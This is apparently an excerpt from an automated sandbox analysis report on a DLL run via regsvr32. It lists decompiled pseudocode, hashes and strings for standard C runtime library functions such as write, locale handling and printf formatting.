                                • Opcode ID: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                • Instruction ID: 5fae40e96951f3d59b44a89f64fcf0ff6634817f5e1c8960b8a37b7fc16bb0b2
                                • Opcode Fuzzy Hash: 3f7f838120eed42c27c7ea3ce685aad0c3061be731b7dc7317e8a9b82dec8473
                                • Instruction Fuzzy Hash: CF313472D1D2428AE3A08B68ED4576EB3E0F741364F615236A2CD866F5D77EE4488B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _free_nolock$_unlock
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpp$pNode->_Next != NULL
                                • API String ID: 2500497606-1087415141
                                • Opcode ID: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                • Instruction ID: 19d3e213fdd89feddaad3ed7c2e4781bfc305c80ac1e5456795dd8baf3e1709b
                                • Opcode Fuzzy Hash: 73e945bef0fa2e243f2cc79ce7faf04cefa07676de83a818dd77e5436e879e5d
                                • Instruction Fuzzy Hash: FB21FC36629B8581EB909B59E89072DA3E4F3C4B94F609426FACE437B4CF7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Exception$Rethrow$DestroyedFindFrameObjectRaiseUnlink
                                • String ID: csm
                                • API String ID: 933340387-1018135373
                                • Opcode ID: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                • Instruction ID: be7caa3ba3d0a30f9fef9d29ccc0ee5b0ac29a888dcf6323555a590ed5530147
                                • Opcode Fuzzy Hash: 185150422f69e9325bbbdd07ff6b0460cc0f5d94f5833ed3dae1d6afaaf19a73
                                • Instruction Fuzzy Hash: BE21FA32A0C64582DAA09B15E49076D67A0F7C0B52F611136EADE077B5CB3BD4418B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-23161695
                                • Opcode ID: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                • Instruction ID: 83327c57c34769199563c7dbb3a6bce46be38180c11154985772b493e57d3243
                                • Opcode Fuzzy Hash: 32410c4887627c76782b03988199a8b6bafae630e8670220b1a4c16fdf178152
                                • Instruction Fuzzy Hash: 611127B1A29602CAF7D0AB24ED5476E72E1F380389F60A125E2DD426E4D7BEE5448B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (buf != NULL)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-3042049227
                                • Opcode ID: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                • Instruction ID: 227cbb44b92b13f2699fc348b07479794ffd84b2571dbd840c84b1baf771b638
                                • Opcode Fuzzy Hash: b156558e5a530bd8cc364ecba4e09f8d8b9f154ab820f1b2babcd7abee70c9c3
                                • Instruction Fuzzy Hash: 1A115731E0C6429AF7A49F24EC117AE73D0F780398FA09126D2CD426E5DB7EE644CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno_invalid_parameter
                                • String ID: (_osfile(fh) & FOPEN)$_write$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 4140903211-1338331675
                                • Opcode ID: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                • Instruction ID: 6bd6a3a9ad0f3f204fba163462b9475bfd771603381d6f38345b55863188decb
                                • Opcode Fuzzy Hash: 11864ca282438847dd27f4dc85d1758fde49d78cd6d39020a8393d86cd701a27
                                • Instruction Fuzzy Hash: 0B0108B1A1C642C6FBA0AB64EC407AD36E0F380358FB04125E2CD476F5D7BEE9458B41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer__doserrno_invalid_parameter
                                • String ID: ((cnt & 1) == 0)$_write_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\write.c
                                • API String ID: 1098298932-1795423647
                                • Opcode ID: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                • Instruction ID: 84e1f9b7d4b50a62aaca49ed338a5ee7eeb2a48d33c586d02a205ea10770b6a2
                                • Opcode Fuzzy Hash: 17be20b0b4ddc98d10ae5d9642fe0f8cd8b1b2069c373d6ecdcef621e5a80c70
                                • Instruction Fuzzy Hash: 8CE03961A0890691F6D4AF14EC113ED2290A740788FE1422290CC072F2CB7EA6058751
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 16%
                                			E000007FE7FEF9D2F570(intOrPtr __edx, long long __rcx, void* __rdx, long long __r8, void* _a8, intOrPtr _a16, long long _a24, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a64) {
                                				long long _v24;
                                				intOrPtr _v32;
                                				long long _v40;
                                				signed int _v48;
                                				int _v52;
                                				int _v56;
                                				signed int _v64;
                                				long long _v72;
                                				long long _t82;
                                
                                				_a32 = r9d;
                                				_a24 = __r8;
                                				_a16 = __edx;
                                				_a8 = __rcx;
                                				_v56 = 0;
                                				if (_a48 != 0) goto 0xf9d2f5ab;
                                				_a48 =  *((intOrPtr*)( *_a8 + 4));
                                				if (_a64 == 0) goto 0xf9d2f5bf;
                                				_v32 = 9;
                                				goto 0xf9d2f5c7;
                                				_v32 = 1;
                                				_v64 = 0;
                                				_v72 = 0;
                                				r9d = _a32;
                                				_v48 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                				if (_v48 != 0) goto 0xf9d2f60b;
                                				goto 0xf9d2f6f8;
                                				if (0 != 0) goto 0xf9d2f652;
                                				if (_v48 <= 0) goto 0xf9d2f652;
                                				if (_v48 - 0xfffffff0 > 0) goto 0xf9d2f652;
                                				_t82 = _v48 + _v48 + 0x10;
                                				E000007FE7FEF9D2F3B0(malloc(??), 0xdddd, _t82);
                                				_v24 = _t82;
                                				goto 0xf9d2f65b;
                                				_v24 = 0;
                                				_v40 = _v24;
                                				if (_v40 != 0) goto 0xf9d2f674;
                                				goto 0xf9d2f6f8;
                                				E000007FE7FEF9D232B0(0, _a48, 0, _v40, __rdx, _v48 << 1);
                                				_v64 = _v48;
                                				_v72 = _v40;
                                				r9d = _a32;
                                				_v52 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                                				if (_v52 == 0) goto 0xf9d2f6ea;
                                				r8d = _v52;
                                				_v56 = GetStringTypeW(??, ??, ??, ??);
                                				E000007FE7FEF9D2F3E0(_v40);
                                				return _v56;
                                			}













                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocaMarkStringTypemalloc
                                • String ID:
                                • API String ID: 2618398691-0
                                • Opcode ID: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                • Instruction ID: 79d90a16a348acae5d1e8c33d658c717d72e619f6ed261e78ac23a31a9732c13
                                • Opcode Fuzzy Hash: 05827e3f81ca9d4f9e036e9cc38fe06689f9ef4e573a4afec1c92632646a1a95
                                • Instruction Fuzzy Hash: 9941E7726187818AD7A08B19E48476EB7E0F385795F204525EADE43BB8DB7ED484CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E000007FE7FEF9D3FF00(intOrPtr __ecx, intOrPtr _a8) {
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v24;
                                
                                				_a8 = __ecx;
                                				_v24 = 0;
                                				_v16 = 0;
                                				0xf9d29300();
                                				_v20 = 0;
                                				_v20 = _v20 + 1;
                                				if (_v20 -  *0xf9d4e520 >= 0) goto 0xf9d40042;
                                				if ( *((long long*)( *0xf9d4d500 + _v20 * 8)) == 0) goto 0xf9d4003d;
                                				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d4003d;
                                				E000007FE7FEF9D3AE90(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000083) == 0) goto 0xf9d40024;
                                				if (_a8 != 1) goto 0xf9d3ffe1;
                                				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) == 0xffffffff) goto 0xf9d3ffdf;
                                				_v24 = _v24 + 1;
                                				goto 0xf9d40024;
                                				if (_a8 != 0) goto 0xf9d40024;
                                				if (( *( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)) + 0x18) & 0x00000002) == 0) goto 0xf9d40024;
                                				if (E000007FE7FEF9D3FD70( *((intOrPtr*)( *0xf9d4d500 + _v20 * 8))) != 0xffffffff) goto 0xf9d40024;
                                				_v16 = 0xffffffff;
                                				E000007FE7FEF9D3AF60(_v20,  *((intOrPtr*)( *0xf9d4d500 + _v20 * 8)));
                                				goto L1;
                                				__ecx = 1;
                                				__eax = E000007FE7FEF9D29360(__eax, 1);
                                				if (_a8 != 1) goto 0xf9d4005b;
                                				__eax = _v24;
                                				goto 0xf9d4005f;
                                				__eax = _v16;
                                				return _v16;
                                			}







                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _fflush_nolock$_lock_file2_unlock_unlock_file2
                                • String ID:
                                • API String ID: 1144694634-0
                                • Opcode ID: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                • Instruction ID: ac60367dbbc332a4a9212cb966813f3525e1d277dda9a6ba7eb8e741a9ed9bf6
                                • Opcode Fuzzy Hash: 9c48fc7a63950d59b547df98b2f037ee7aefe6eda58a35de18d9feeb54d081ae
                                • Instruction Fuzzy Hash: D441F136A08905C5EB70CB1DE98173D73E0F799B49F204225EA9D877B4CB3EE945CA01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E000007FE7FEF9D33CC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                				long long _v16;
                                				long long _v24;
                                				intOrPtr _v32;
                                				long long _v40;
                                				long long _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				signed int _v64;
                                				long long _v72;
                                				char _v80;
                                				long long _v88;
                                				void* _t135;
                                				void* _t145;
                                				void* _t147;
                                				void* _t148;
                                				void* _t149;
                                				signed int* _t200;
                                				intOrPtr _t206;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				0xf9d24000();
                                				if ( *((intOrPtr*)(__rax + 0x2c0)) != 0) goto 0xf9d33d6c;
                                				if ( *_a8 == 0xe06d7363) goto 0xf9d33d6c;
                                				if ( *_a8 != 0x80000029) goto 0xf9d33d2a;
                                				if ( *((intOrPtr*)(_a8 + 0x18)) != 0xf) goto 0xf9d33d2a;
                                				if ( *((long long*)(_a8 + 0x60)) == 0x19930520) goto 0xf9d33d6c;
                                				if ( *_a8 == 0x80000026) goto 0xf9d33d6c;
                                				if (( *_a40 & 0x1fffffff) - 0x19930522 < 0) goto 0xf9d33d6c;
                                				if ((_a40[9] & 0x00000001) == 0) goto 0xf9d33d6c;
                                				goto 0xf9d3409c;
                                				if (( *(_a8 + 4) & 0x00000066) == 0) goto 0xf9d33ef3;
                                				if (_a40[1] == 0) goto 0xf9d33ee4;
                                				if (_a48 != 0) goto 0xf9d33ee4;
                                				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33e40;
                                				if ( *_a8 != 0x80000026) goto 0xf9d33e40;
                                				_v56 = E000007FE7FEF9D33A60(_a24, _a40, _a32,  *((intOrPtr*)(_a24 + 0xf8)));
                                				if (_v56 - 0xffffffff < 0) goto 0xf9d33e0a;
                                				if (_v56 - _a40[1] >= 0) goto 0xf9d33e0a;
                                				goto 0xf9d33e0f;
                                				E000007FE7FEF9D2CF80(_a40);
                                				r9d = _v56;
                                				E000007FE7FEF9D34F20(_a40, _a16, _a32, _a40);
                                				goto 0xf9d33ec7;
                                				if (( *(_a8 + 4) & 0x00000020) == 0) goto 0xf9d33ec7;
                                				if ( *_a8 != 0x80000029) goto 0xf9d33ec7;
                                				_v48 = _a8;
                                				_v52 =  *((intOrPtr*)(_v48 + 0x38));
                                				if (_v52 - 0xffffffff < 0) goto 0xf9d33e95;
                                				if (_v52 - _a40[1] >= 0) goto 0xf9d33e95;
                                				goto 0xf9d33e9a;
                                				E000007FE7FEF9D2CF80(_a40);
                                				r9d = _v52;
                                				E000007FE7FEF9D34F20(_v48,  *((intOrPtr*)(_v48 + 0x28)), _a32, _a40);
                                				goto 0xf9d3409c;
                                				E000007FE7FEF9D2E790(_v52 - _a40[1], _v48, _a16, _a32, _a40);
                                				goto 0xf9d34097;
                                				if (_a40[3] != 0) goto 0xf9d33f59;
                                				if (( *_a40 & 0x1fffffff) - 0x19930521 < 0) goto 0xf9d34097;
                                				_t200 = _a40;
                                				if ( *((intOrPtr*)(_t200 + 0x20)) == 0) goto 0xf9d33f44;
                                				_t135 = E000007FE7FEF9D2E680( *_a40 & 0x1fffffff, _t200);
                                				_v24 = _t200 + _a40[8];
                                				goto 0xf9d33f4d;
                                				_v24 = 0;
                                				if (_v24 == 0) goto 0xf9d34097;
                                				if ( *_a8 != 0xe06d7363) goto 0xf9d34041;
                                				if ( *((intOrPtr*)(_a8 + 0x18)) - 3 < 0) goto 0xf9d34041;
                                				if ( *((intOrPtr*)(_a8 + 0x20)) - 0x19930522 <= 0) goto 0xf9d34041;
                                				_t206 =  *((intOrPtr*)(_a8 + 0x30));
                                				if ( *((intOrPtr*)(_t206 + 8)) == 0) goto 0xf9d33fc5;
                                				E000007FE7FEF9D2E6A0(_t135, _t206);
                                				_v16 = _t206 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 8));
                                				goto 0xf9d33fce;
                                				_v16 = 0;
                                				_v40 = _v16;
                                				_t177 = _v40;
                                				if (_v40 == 0) goto 0xf9d34041;
                                				_v64 = _a64 & 0x000000ff;
                                				_v72 = _a56;
                                				_v80 = _a48;
                                				_v88 = _a40;
                                				_v32 = _v40();
                                				goto 0xf9d34097;
                                				_v64 = _a56;
                                				_v72 = _a48;
                                				_v80 = _a64 & 0x000000ff;
                                				_v88 = _a40;
                                				E000007FE7FEF9D340B0(_t145, _t147, _t148, _t149, _t177, _a40, _a8, _a16, _a24, _a32);
                                				return 1;
                                			}






















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _inconsistency
                                • String ID: csm$csm
                                • API String ID: 32975420-3733052814
                                • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __free_lconv_mon__free_lconv_num
                                • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                • API String ID: 2148069796-2706031433
                                • Opcode ID: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                • Instruction ID: d8e48e7000e52547e61d66b201573bb281919b8ac3286b667feec84700a76b7c
                                • Opcode Fuzzy Hash: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                • Instruction Fuzzy Hash: 60A11E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                • String ID: @'/$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                • API String ID: 4112623284-1960733172
                                • Opcode ID: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                • Instruction ID: b519865c658f5b17901cea146d1bd99b4d455d983c8f9f0677e22a9713547b35
                                • Opcode Fuzzy Hash: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                • Instruction Fuzzy Hash: 8E911D3661DB8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3717698799
                                • Opcode ID: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                • Instruction ID: f46ca83dba6c4e2be9a9571e906a820c6a216ec021220a7175966cdc7e38441f
                                • Opcode Fuzzy Hash: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                • Instruction Fuzzy Hash: EB810D31A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                				signed int _t212;
                                				signed char _t217;
                                				intOrPtr _t252;
                                				signed int _t327;
                                				signed int _t328;
                                				signed long long _t331;
                                				intOrPtr* _t354;
                                				signed long long _t379;
                                
                                				_t327 = __rax;
                                				_a708 = 0x27;
                                				_a72 = 0x10;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                				_a84 = 0x30;
                                				_a85 = _a708 + 0x51;
                                				_a92 = 2;
                                				_a72 = 8;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                				asm("bts eax, 0x9");
                                				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t327;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                				E000007FE7FEF9D31EA0( &_a1112);
                                				_a824 = _t327;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                				_t328 = E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t328;
                                				goto 0xf9d3c80e;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t328;
                                				goto 0xf9d3c84b;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t328;
                                				goto 0xf9d3c84b;
                                				E000007FE7FEF9D31E40( &_a1112);
                                				_a824 = _t328;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                				if (_a824 >= 0) goto 0xf9d3c882;
                                				_a832 =  ~_a824;
                                				asm("bts eax, 0x8");
                                				goto 0xf9d3c892;
                                				_t331 = _a824;
                                				_a832 = _t331;
                                				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                				_a832 = _a832 & _t331;
                                				if (_a116 >= 0) goto 0xf9d3c8d8;
                                				_a116 = 1;
                                				goto 0xf9d3c8f5;
                                				_a80 = _a80 & 0xfffffff7;
                                				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                				_a116 = 0x200;
                                				if (_a832 != 0) goto 0xf9d3c908;
                                				_a92 = 0;
                                				_a64 =  &_a687;
                                				_t212 = _a116;
                                				_a116 = _a116 - 1;
                                				if (_t212 > 0) goto 0xf9d3c936;
                                				if (_a832 == 0) goto 0xf9d3c9d3;
                                				_a1040 = _a72;
                                				_a816 = _t212 / _a1040 + 0x30;
                                				_a1048 = _a72;
                                				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
